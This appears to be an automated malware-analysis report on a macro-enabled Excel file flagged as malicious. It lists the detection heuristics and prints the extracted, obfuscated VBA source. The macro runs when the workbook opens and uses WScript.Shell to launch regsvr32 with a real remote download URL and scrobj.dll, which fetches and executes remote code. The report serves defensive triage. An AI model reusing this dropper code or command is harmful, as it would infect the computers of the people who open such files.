MALICIOUS
390
Risk Score
Heuristics 9
-
ClamAV: Xls.Malware.Valyria-10036093-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036093-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set Ak = CreateObject("WScript.Shell") -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Ak.Run ("regsvr32 /siMePcFiWtLSQBKSMsrRsXHUpAunAuncPoWYsaBPnZniToANL /nvToQWTFQITCpdXQHGELKohIAURWtzGTEFVUyEeirytNtFDTs /uiMePcFiWtLSQBKSMsrRsXHUpAunAuncPoWYsaBPnZniToANL /i:https://www.4sync.com/web/directDownload/LzUD8Sds/vgsrc_NR.d60e254a96f61d869f33fdab59970eeb scrobj.dll VwOiWwvFXzZJLXYEUbRpiYErdiDJWobzcoBLcfHZLJKKcpwb") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Ak = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.4sync.com/web/directDownload/LzUD8Sds/vgsrc_NR.d60e254a96f61d869f33fdab59970eeb In document text (OOXML body / shared strings)
- https://www.4sync.com/web/directDownload/LzUD8Sds/vgsrc_NR.dIn document text (OOXML body / shared strings)
- https://www.4sync.com/web/directDownload/LzUD8Sds/vgsrc_In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15279 bytes |
SHA-256: 524e610dc0121b16c46d5f95ba5345e91742d7bd85ff39ebf5a24e4de349f280 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim HKXINPNLDTvIAUQGSWuNFhZJUMbTOQpE As Workbook, QYUzEzEvrIceZRfzcocKZtCudtcUUQONoTLQQNhOQpJVPbKVsOpkirDzCHs As Workbook, EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI As Workbook, XRdoKZDQdtMBctILFKJsiYQMMnPEbJwvebKAOUSQZiEGofSscMcHiTGZat As Workbook
Dim oMb As Workbook, trzndkHMbXCZwhcuwBBrBkWUoEMIaBoeARKYoXEWQTpS As Workbook, GCJYHQVdczwCSwGzrpkaLPURzQdWbkWhK As Workbook, PK As Workbook
Dim hpJWLsHSvIXYiftMyEXMTtRZKdKwnhzQAkuQViffdcXPDzRpQESTfYyP As Integer, eFfNWHBT As Integer, AuQOZuRpChKwnTBFuooEOwLchzWdWONObHOXSVfcCKpPiy As Integer, AnCWUsSBSKVTKrENtzGtVKpMLdpRdZOUDvbvXMCPQXCwZSWwwbPvWXXQePvRibtT As Integer
Dim ZNhAKUvwiUkzNTwPXdDMsQfeWUFskKQnEnQLGXswZorrRiCGsIVzG As Range, VFGCZFJyY As Range, sStwYSBIBzYMWGtLSTVHwKckzuQpPvkwfRvRCLtkAZInCpCFnOLnNwC As Range
Dim EtRPZtSnFhMr As Range, ZdysQibDNcBvMXhrpoFLnTcndoFBnCbuXnGJwINyIFGWITkeWUzY As Range, VJZSPNKWLrQNnKdBPTiOQnzzshzI As Range, OhBwOvpnHHbkUuWDoyMNkNMEIWkNVyThfKCtAdpJCftVuytRVhI As Range, ynQEpIdMJaQNGQnSphHBUDsQkZtzTstUpkIwTUYWV As Range, XNozPrepothINbhMAtVetrPszfWeZWTnsiIBretZVTaQuENPBAMMAHtszXXta As Range
Dim ATAr As Variant, FiUEChrTaQNNhFnPKHDR As Variant
Dim sBYO As String
Dim SvNSJyWIdhEToHeRBHcLOpDpkK, eEypWUCsJikzzWYzVRXAFi As Long
Dim oLuXPtENrKMXIKYWHGMrNVwoIdSsdSuLdZZHvfLGZSQBdIWz As Variant
oLuXPtENrKMXIKYWHGMrNVwoIdSsdSuLdZZHvfLGZSQBdIWz = Array("JAIVHReENzCVrzWUkiCNESDJnhMOhMHBiYZ #", "ReiYYfuRXFJXwASvfhkfYUNwFLNuLZWYizaOnG", "VaTTtiKkaafTTZVRQPfakOMWSnFdnFSd", "JAIVHReENzCVrzWUkiCNESDJnhMOhMHBiYZ GsFUEPdBLrzVwrWTkiyLBQAHwhKNhKEthYZkDwtiZKGWhwTS", "JAIVHReENzCVrzWUkiCNESDJnhMOhMHBiYZ UbSSoiIkbafTTZUQPOfapMKVSpCdpCQdwXYPPrdOZCtywSQu", "iMePcFiWtLSQBKSMsrRsXHUpAunAuncPoWYsaBPnZniToANL vToQWTFQITCpdXQHGELKohIAURWtzGTEFVUyEeirytNtFDTs", "VwOiWwvFXzZJLXYEUbRpiYErdiDJWobzcoBLcfHZLJKKcpwb")
Dim FHwEVHYovZBenWfAkEYObQBwvEeWyaprFLcYFfbKYWIXGWIM As Long, kZLUVYLcGFYEWWutDceuUItfzULpUNtvdcIvchBnvkFpdIZt As Long
Dim kXHn As String, LPrsIWGZZyPnTrYTZhILuIWnAAo As String
For eFfNWHBT = 1 To SvNSJyWIdhEToHeRBHcLOpDpkK
kXHn = EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & eFfNWHBT).Value
LPrsIWGZZyPnTrYTZhILuIWnAAo = EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("JzIVGRdENzC" & eFfNWHBT).Value
Select Case True
Case kXHn = "CNHHTMeGwMYyiVHphctrHuwVPITOTiNceRPRdknKROAPebNN:": EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & eFfNWHBT & ":JzIVGRdENzC" & eFfNWHBT).Font.Bold = True
Case InStr(1, kXHn, "ReiYYfuRXFJXwASvfhkfYUNwFLNuLZWYizaOnG: ")
EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & eFfNWHBT & ":NSMDJMGDnbbDABcVwvDoFdzeEobhb" & eFfNWHBT).Interior.ColorIndex = 15
EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & eFfNWHBT).Font.Bold = True
Case InStr(1, LPrsIWGZZyPnTrYTZhILuIWnAAo, "tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ"): EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("JzIVGRdENzC" & eFfNWHBT & ":JzIVGRdENzC" & (eFfNWHBT + 2)).Interior.ColorIndex = 37
Case InStr(1, LPrsIWGZZyPnTrYTZhILuIWnAAo, "JzIVGRdENzC"): EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("JzIVGRdENzC" & eFfNWHBT & ":JzIVGRdENzC" & (eFfNWHBT + 2)).Interior.ColorIndex = 3
Case InStr(1, LPrsIWGZZyPnTrYTZhILuIWnAAo, "OWafKJOepRTNLuUphDPisfvrKiMvrrQzOJLPQrburXCEDyGrOYsdheMIKLADXDOUbAZ"): EoXUIAhtVKfOzXRWDLiLQbrzMvkNOhiNPSorI.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("JzIVGRdENzC" & eFfNWHBT & ":JzIVGRdENzC" & (eFfNWHBT + 2)).Interior.Color = RGB(50, 205, 50)
End Select
Next eFfNWHBT
Application.DisplayAlerts = False
Dim oOWNYOzDJhZUwZ As PivotItem
With Application.FileDialog(msoFileDialogFilePicker)
.AllowMultiSelect = False
'VJZSPNKWLrQNnKdBPTiOQnzzshzI wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX eFfNWHBT sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu
.Filters.Add "Excel Files", "*.HCSAXCSbouZPBYJLvbFhAnLFMAreXTLI; *.vToQWTFQITCpdXQHGE; *.XftdYffuYMCnSYCPXDyHGCPKEdORBhDMEhNSEcoZ; *.VwOiWwvFXzZJLXYEUbRpiYErdiDJWobzcoBLcfHZLJKKcpwbQeZBJspXLzeO; *.FHw", 1
Set Ak = CreateObject("WScript.Shell")
Ak.Run ("regsvr32 /siMePcFiWtLSQBKSMsrRsXHUpAunAuncPoWYsaBPnZniToANL /nvToQWTFQITCpdXQHGELKohIAURWtzGTEFVUyEeirytNtFDTs /uiMePcFiWtLSQBKSMsrRsXHUpAunAuncPoWYsaBPnZniToANL /i:https://www.4sync.com/web/directDownload/LzUD8Sds/vgsrc_NR.d60e254a96f61d869f33fdab59970eeb scrobj.dll VwOiWwvFXzZJLXYEUbRpiYErdiDJWobzcoBLcfHZLJKKcpwb")
.Show
'ReiYYfuRXFJXwASvfhkfYUNwFLNuLZWYizaOnG tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ /nvToQWTFQITCpdXQHGELKohIAURWtzGTEFVUyEeirytNtFDTs wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX
End With
If InStr(fullpath, ".XftdYffuYMCnSYCPXDyHGCPKEdORBhDMEhNSEcoZ") = 0 Then
Exit Sub
End If
Set ws = Workbooks.Open(fullpath)
Set wb = Workbooks.Add
ws.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).UsedRange.Copy Destination:=wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & Rows.MBVvkHHKGbXbFTkQtfTSdhiHXkKtHWphRinIKRbJ).End(xlUp)
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("PtfZhLUETIPzSLFIVVLBKerdshNedOtMKhcVWTaWOczHL").Value = "Status"
lRow = wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Cells(Rows.MBVvkHHKGbXbFTkQtfTSdhiHXkKtHWphRinIKRbJ, 1).End(xlUp).Row
For vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt = 2 To lRow
If wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("H" & vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt).Value = 0 And wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu(1).Range("I" & vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt).Value = 0 Then
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt" & vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt).Value = "OWafKJOepRTNLuUphDPisfvrKiMvrrQzOJLPQrburXCEDyGrOYsdheMIKLADXDOUbAZ"
Else
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt" & vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt).Value = "OWafKJOepRTNLuUphDPisfvrKiMvrrQzOJLPQrburXCEDyGrOYsdheMIKLADXDOUbAZ"
End If
Next vhcFVinRbNnGPCpWDMwRDIQpahpKMEdFpUTSTeaeEDXGeDezBnBFBYrJsTEOXJeCJOt
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("ncunTwHLnnfYcnGObBcAeGYLzfuyksvhbTHefhatsNTKzTkQzJRFPDSNeH:PtfZhLUETIPzSLFIVVLBKerdshNedOtMKhcVWTaWOczHL").AutoFilter _
Field:=4, _
Criteria1:=Array("EN", "EN/oHiztpAvLDpuVVVruehhQHUXMhvEAXKTftwYZIaNXIVIuL", "FF", "FF/oHiztpAvLDpuVVVruehhQHUXMhvEAXKTftwYZIaNXIVIuL", "QSwTINbYCzKfZewcKoHQXezRdfPYR", "QSwTINbYCzKfZewcKoHQXezRdfPYR/oHiztpAvLDpuVVVruehhQHUXMhvEAXKTftwYZIaNXIVIuL"), _
Operator:=xlFilterValues
'VaTTtiKkaafTTZVRQPfakOMWSnFdnFSd
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("ncunTwHLnnfYcnGObBcAeGYLzfuyksvhbTHefhatsNTKzTkQzJRFPDSNeH:PtfZhLUETIPzSLFIVVLBKerdshNedOtMKhcVWTaWOczHL").AutoFilter _
Field:=5, _
Criteria1:=Array("1", "2", "3", "4", "5", "6", "7"), _
Operator:=xlFilterValues
'ReiYYfuRXFJXwASvfhkfYUNwFLNuLZWYizaOnG
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Range("ncunTwHLnnfYcnGObBcAeGYLzfuyksvhbTHefhatsNTKzTkQzJRFPDSNeH:PtfZhLUETIPzSLFIVVLBKerdshNedOtMKhcVWTaWOczHL").AutoFilter _
Field:=7, _
Criteria1:=Array("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ", "JzIVGRdENzC", "OWafKJOepRTNLuUphDPisfvrKiMvrrQzOJLPQrburXCEDyGrOYsdheMIKLADXDOUbAZ"), _
Operator:=xlFilterValues
Worksheets("iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk").Cells(1, 1).Select
sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu.Add
wb.PivotCaches.Create(SourceType:=xlDatabase, SourceData:= _
"iYvtScOLPCSoCDoedhsFrZndDHRpICfnPUFUWcwhLVOSYvUsTEiUtyWk!R1C1:R" & lRow & "wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX", Version:=xlPivotTableVersion15).CreatePivotTable _
TableDestination:="uzKVSCfoQwERUPtZDGPC!R3C1", TableName:="PivotTable1", DefaultVersion _
:=xlPivotTableVersion15
sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Select
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).AddFields _
ColumnFields:="tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ", _
RowFields:=Array("ReiYYfuRXFJXwASvfhkfYUNwFLNuLZWYizaOnG", "rDtkruNfYfbKpNvkRTYPtGbzfenvWORzXrYvuJaaOTQNHbvYVnaEzuePB", "rDtkruNfYfbKpNvkRTYPtGbzfenvWORzXrYvuJaaOTQNHbvYVnaEzuePB", "rDtkruNfYfbKpNvkRTYPtGbzfenvWORzXrYvuJaaOTQNHbvYVnaEzuePB", "rDtkruNfYfbKpNvkRTYPtGbzfenvWORzXrYvuJaaOTQNHbvYVnaEzuePB")
With wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).PivotFields("SorOeOiyhpGRfDWBzKDevdDFPeQSFFEuCeQkpVakFonLaXMU")
.Orientation = xlDataField
.Name = "MBVvkHHKGbXbFTkQtfTSdhiHXkKtHWphRinIKRbJ"
.Function = xlCount
End With
With wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).PivotFields("SorOeOiyhpGRfDWBzKDevdDFPeQSFFEuCeQkpVakFonLaXMU")
.Orientation = xlDataField
.Name = "CNHHTMeG"
.NumberFormat = "CNHHTMeG"
.Function = xlCount
.Calculation = xlPercentOfRow
End With
With wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).PivotFields("ReiYYfuRXFJXwASvfhkfYUNwFLNuLZWYizaOnG")
.dERURIyeOPiPewwwJ("kZLU").Visible = False
.dERURIyeOPiPewwwJ("kZLU").Visible = False
.dERURIyeOPiPewwwJ("kZLU").Visible = False
.dERURIyeOPiPewwwJ("kZLU").Visible = False
.dERURIyeOPiPewwwJ("(kZLU)").Visible = False
End With
With wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).PivotFields("Battalion")
.dERURIyeOPiPewwwJ("kZLU").Visible = False
.dERURIyeOPiPewwwJ("(kZLU)").Visible = False
End With
For Each oOWNYOzDJhZUwZ In wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).PivotFields("Rank").dERURIyeOPiPewwwJ
On Error Resume Next
oOWNYOzDJhZUwZ.Visible = False
Next oOWNYOzDJhZUwZ
With wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).PivotFields("Rank")
.dERURIyeOPiPewwwJ("Ss").Visible = True
.dERURIyeOPiPewwwJ("Ss/Ss").Visible = True
.dERURIyeOPiPewwwJ("Ss").Visible = True
.dERURIyeOPiPewwwJ("Ss/Ss").Visible = True
.dERURIyeOPiPewwwJ("Ss").Visible = True
.dERURIyeOPiPewwwJ("Ss/Ss").Visible = True
.dERURIyeOPiPewwwJ("(Ss)").Visible = False
End With
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).PivotFields("Battalion").ShowDetail = False
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").PivotTables(1).RefreshTable
For j = 7 To 13
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & j).Value = "Battalion " & wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & j).Value
Debug.Print (j)
Next j
For k = 6 To 22 Step 8
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & k).Value = "ReiYYfuRXFJXwASvfhkfYUNwFLNuLZWYizaOnG " & wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & k).Value
Next k
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX").Value = "MBVvkHHKGbXbFTkQtfTSdhiHXkKtHWphRinIKRbJ"
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX").Value = "%"
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX").EntireRow.Hidden = True
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ:wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX").Columns.AutoFit
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Columns("wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX").Hidden = True
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX:wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX").Interior.Color = vbRed
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX:wMXLzfkttWyUIdECOnnDpIMBnikRYhDuuyDLNGbBhtaDX").Interior.ColorIndex = 22
For m = 7 To 23 Step 8
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & m & ":F" & m + 6).Interior.Color = vbYellow
wb.sTdyTWBURXprucATXakzteGSXWdXWCpsHBFfHCNUOuWPnJGIPpVQyzu("uzKVSCfoQwERUPtZDGPC").Range("tNtXQBHPzMOXKMYXJJOzPWntKdTAdTsNeZZJsfNJZ" & m - 1 & ":F" & m - 1).Interior.ColorIndex = 15
Next m
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 30720 bytes |
SHA-256: 15bfef8041b7f9d984bafaffdb48580ef219bf1cfadd01cb4df150e8cf6ec5c8 |
|||
|
Detection
ClamAV:
Xls.Malware.Valyria-10036093-0
Obfuscation or payload:
likely
361 of 577 identifiers look randomly generated (e.g. 'tNtXQBHPzMOXKMYXJJOzPWntKdTAcAeGYLzfuyks') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.